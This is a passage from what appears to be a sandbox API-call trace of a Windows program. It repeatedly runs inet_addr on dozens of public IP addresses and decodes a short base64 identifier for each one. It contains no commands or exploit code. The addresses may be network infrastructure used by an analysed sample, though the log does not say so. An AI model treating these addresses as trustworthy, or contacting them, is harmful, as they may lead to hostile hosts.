pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8be68 [0119.441] inet_addr (cp="54.36.112.234") returned 0xea702436 [0119.441] CryptStringToBinaryA (in: pszString="BuclJrvgQMUcWt+6oHrdmuteH6E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] CryptStringToBinaryA (in: pszString="BuclJrvgQMUcWt+6oHrdmuteH6E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8c168 [0119.441] inet_addr (cp="94.23.247.42") returned 0x2af7175e [0119.441] CryptStringToBinaryA (in: pszString="Buk9dEI/6FbeHuZHj5O/KGC6bS0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] CryptStringToBinaryA (in: pszString="Buk9dEI/6FbeHuZHj5O/KGC6bS0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8c6e8 [0119.441] inet_addr (cp="185.150.117.107") returned 0x6b7596b9 [0119.441] CryptStringToBinaryA (in: pszString="BuwsFmnlqBHZZA4HztV4baUMVzc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] CryptStringToBinaryA (in: pszString="BuwsFmnlqBHZZA4HztV4baUMVzc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8c1e8 [0119.441] inet_addr (cp="185.220.100.245") returned 0xf564dcb9 [0119.441] CryptStringToBinaryA (in: pszString="BvPX3KtqoUrR1qJ33asRINhuOU4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] CryptStringToBinaryA (in: pszString="BvPX3KtqoUrR1qJ33asRINhuOU4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8c2e8 [0119.441] inet_addr (cp="116.240.95.122") returned 0x7a5ff074 [0119.442] CryptStringToBinaryA (in: pszString="BvnoaTCCPKhlQd3+uYJ6IrmnpK0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="BvnoaTCCPKhlQd3+uYJ6IrmnpK0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c368 [0119.442] inet_addr (cp="172.105.116.135") returned 0x877469ac [0119.442] CryptStringToBinaryA (in: pszString="BwMSnbipacsbbF/aBqs7YtiefOE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="BwMSnbipacsbbF/aBqs7YtiefOE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c3e8 [0119.442] inet_addr (cp="159.69.147.81") returned 0x5193459f [0119.442] CryptStringToBinaryA (in: pszString="BwQGL7mlpWWTYaC49CuItkGaG0Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="BwQGL7mlpWWTYaC49CuItkGaG0Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c468 [0119.442] inet_addr (cp="94.130.10.251") returned 0xfb0a825e [0119.442] CryptStringToBinaryA (in: pszString="BwazrwBZyyJuSqze22eUZ49AKQU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="BwazrwBZyyJuSqze22eUZ49AKQU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c5e8 [0119.442] inet_addr (cp="51.15.174.47") returned 0x2fae0f33 [0119.442] CryptStringToBinaryA (in: pszString="Bw04cjDBuVoFgRxbci+9IaEHa9s", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="Bw04cjDBuVoFgRxbci+9IaEHa9s", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c568 [0119.442] inet_addr (cp="198.255.112.10") returned 0xa70ffc6 [0119.442] CryptStringToBinaryA (in: pszString="Bw8QJuZa1vXl3d1gSJfamIV8474", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] CryptStringToBinaryA (in: pszString="Bw8QJuZa1vXl3d1gSJfamIV8474", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.442] malloc (_Size=0x74) returned 0x3d8c668 [0119.442] inet_addr (cp="47.53.193.195") returned 0xc3c1352f [0119.443] CryptStringToBinaryA (in: pszString="BxKIshgnEeUoQkgTcEjg+7+zYjM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="BxKIshgnEeUoQkgTcEjg+7+zYjM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d5e8 [0119.443] inet_addr (cp="91.121.147.65") returned 0x4193795b [0119.443] CryptStringToBinaryA (in: pszString="ByOtbQXyFoq/OHAleVqNFu8C8go", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="ByOtbQXyFoq/OHAleVqNFu8C8go", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d7e8 [0119.443] inet_addr (cp="81.170.155.6") returned 0x69baa51 [0119.443] CryptStringToBinaryA (in: pszString="By5OxH1kARjVQ4v/3/Gve7TirSs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="By5OxH1kARjVQ4v/3/Gve7TirSs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d2e8 [0119.443] inet_addr (cp="45.150.64.55") returned 0x3740962d [0119.443] CryptStringToBinaryA (in: pszString="B0OqcX1JjzjGXs0eGSBX8ZB2XGg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="B0OqcX1JjzjGXs0eGSBX8ZB2XGg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d668 [0119.443] inet_addr (cp="5.39.87.124") returned 0x7c572705 [0119.443] CryptStringToBinaryA (in: pszString="B0WFewYze380NjVgiXWXKp7BSQE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="B0WFewYze380NjVgiXWXKp7BSQE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d6e8 [0119.443] inet_addr (cp="193.234.15.56") returned 0x380feac1 [0119.443] CryptStringToBinaryA (in: pszString="B1/dhe9LeDvMkEBYAWjx/FV2sQE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] CryptStringToBinaryA (in: pszString="B1/dhe9LeDvMkEBYAWjx/FV2sQE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.443] malloc (_Size=0x74) returned 0x3d8d768 [0119.443] inet_addr (cp="51.195.91.166") returned 0xa65bc333 [0119.444] CryptStringToBinaryA (in: pszString="B2IwE8M2H+VmtxyM/MZIPXWHqCc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B2IwE8M2H+VmtxyM/MZIPXWHqCc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8cfe8 [0119.444] inet_addr (cp="45.33.46.101") returned 0x652e212d [0119.444] CryptStringToBinaryA (in: pszString="B5BaDYrRwTTTA2hyFAsdset2F3I", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B5BaDYrRwTTTA2hyFAsdset2F3I", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8cc68 [0119.444] inet_addr (cp="185.212.149.111") returned 0x6f95d4b9 [0119.444] CryptStringToBinaryA (in: pszString="B5TjeKHukzfZF77ohgehwSrH+QY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B5TjeKHukzfZF77ohgehwSrH+QY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8d868 [0119.444] inet_addr (cp="176.123.8.232") returned 0xe8087bb0 [0119.444] CryptStringToBinaryA (in: pszString="B54RfguAhIRkbKdxX1L2/8gx748", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B54RfguAhIRkbKdxX1L2/8gx748", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8cde8 [0119.444] inet_addr (cp="85.10.203.71") returned 0x47cb0a55 [0119.444] CryptStringToBinaryA (in: pszString="B6aNuoTdtzCsc9R2g87GvyRIpTI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B6aNuoTdtzCsc9R2g87GvyRIpTI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8d3e8 [0119.444] inet_addr (cp="222.239.250.56") returned 0x38faefde [0119.444] CryptStringToBinaryA (in: pszString="B6hsG9FgY/qeVUndKxk6vRZjQow", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] CryptStringToBinaryA (in: pszString="B6hsG9FgY/qeVUndKxk6vRZjQow", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.444] malloc (_Size=0x74) returned 0x3d8d468 [0119.445] inet_addr (cp="50.115.165.158") returned 0x9ea57332 [0119.445] CryptStringToBinaryA (in: pszString="B6imYWS4dSqeBtRKq2IZ2J1sEPY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B6imYWS4dSqeBtRKq2IZ2J1sEPY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8d168 [0119.445] inet_addr (cp="45.76.115.159") returned 0x9f734c2d [0119.445] CryptStringToBinaryA (in: pszString="B7NbzPYhHm2XCgFQEvyaLGdoSPk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B7NbzPYhHm2XCgFQEvyaLGdoSPk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8d8e8 [0119.445] inet_addr (cp="158.174.11.156") returned 0x9c0bae9e [0119.445] CryptStringToBinaryA (in: pszString="B7j8W2ZxnDVfq/hLT14BMeEn3wE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B7j8W2ZxnDVfq/hLT14BMeEn3wE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8c968 [0119.445] inet_addr (cp="85.91.153.163") returned 0xa3995b55 [0119.445] CryptStringToBinaryA (in: pszString="B8PrvkHfn+hVHfaWQv66cOlU3A8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B8PrvkHfn+hVHfaWQv66cOlU3A8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8c9e8 [0119.445] inet_addr (cp="185.177.151.42") returned 0x2a97b1b9 [0119.445] CryptStringToBinaryA (in: pszString="B8U21zKFDjq7tRF2+8+eefwsbno", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B8U21zKFDjq7tRF2+8+eefwsbno", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8d368 [0119.445] inet_addr (cp="84.134.101.11") returned 0xb658654 [0119.445] CryptStringToBinaryA (in: pszString="B8g2flt9F4uJlXhXi/wRH7Td8uo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] CryptStringToBinaryA (in: pszString="B8g2flt9F4uJlXhXi/wRH7Td8uo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.445] malloc (_Size=0x74) returned 0x3d8ce68 [0119.446] inet_addr (cp="51.15.85.13") returned 0xd550f33 [0119.446] CryptStringToBinaryA (in: pszString="B/nxO8s+H2EX+yEZBRJ69B5y4Ic", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] CryptStringToBinaryA (in: pszString="B/nxO8s+H2EX+yEZBRJ69B5y4Ic", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] malloc (_Size=0x74) returned 0x3d8cb68 [0119.446] inet_addr (cp="216.150.65.94") returned 0x5e4196d8 [0119.446] CryptStringToBinaryA (in: pszString="CASVXL5HDMUK27avTW34C7d6XoM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] CryptStringToBinaryA (in: pszString="CASVXL5HDMUK27avTW34C7d6XoM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] malloc (_Size=0x74) returned 0x3d8ca68 [0119.446] inet_addr (cp="83.39.189.20") returned 0x14bd2753 [0119.446] CryptStringToBinaryA (in: pszString="CAu/mxRFSXb96tGtYgoEOI9aIfg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] CryptStringToBinaryA (in: pszString="CAu/mxRFSXb96tGtYgoEOI9aIfg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.446] malloc (_Size=0x74) returned 0x3d8cae8 [0119.447] inet_addr (cp="83.212.102.114") returned 0x7266d453 [0119.447] CryptStringToBinaryA (in: pszString="CCTXx/sRfVxqwBWB/XmOZww3yAQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] CryptStringToBinaryA (in: pszString="CCTXx/sRfVxqwBWB/XmOZww3yAQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] malloc (_Size=0x74) returned 0x3d8d068 [0119.447] inet_addr (cp="80.66.135.123") returned 0x7b874250 [0119.447] CryptStringToBinaryA (in: pszString="CCwooJSECyse5xqBKpaFjEsobLw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] CryptStringToBinaryA (in: pszString="CCwooJSECyse5xqBKpaFjEsobLw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] malloc (_Size=0x74) returned 0x3d8cce8 [0119.447] inet_addr (cp="54.172.214.11") returned 0xbd6ac36 [0119.447] CryptStringToBinaryA (in: pszString="CDVE3W5ePxMVoV3EKhVr+LQYX5A", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] CryptStringToBinaryA (in: pszString="CDVE3W5ePxMVoV3EKhVr+LQYX5A", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] malloc (_Size=0x74) returned 0x3d8d0e8 [0119.447] inet_addr (cp="31.220.40.239") returned 0xef28dc1f [0119.447] CryptStringToBinaryA (in: pszString="CDlMSHPIpxvp9TWT+bStaUv825A", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] CryptStringToBinaryA (in: pszString="CDlMSHPIpxvp9TWT+bStaUv825A", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] malloc (_Size=0x74) returned 0x3d8cbe8 [0119.447] inet_addr (cp="185.56.171.94") returned 0x5eab38b9 [0119.447] CryptStringToBinaryA (in: pszString="CDxSBRFA24r3cL1Ax8iIPv/0yvM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] CryptStringToBinaryA (in: pszString="CDxSBRFA24r3cL1Ax8iIPv/0yvM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.447] malloc (_Size=0x74) returned 0x3d8cd68 [0119.447] inet_addr (cp="212.227.165.251") returned 0xfba5e3d4 [0119.448] CryptStringToBinaryA (in: pszString="CECZCfRkc5Qvcz4Sa3jynTiNYPU", cchString=0x1b, 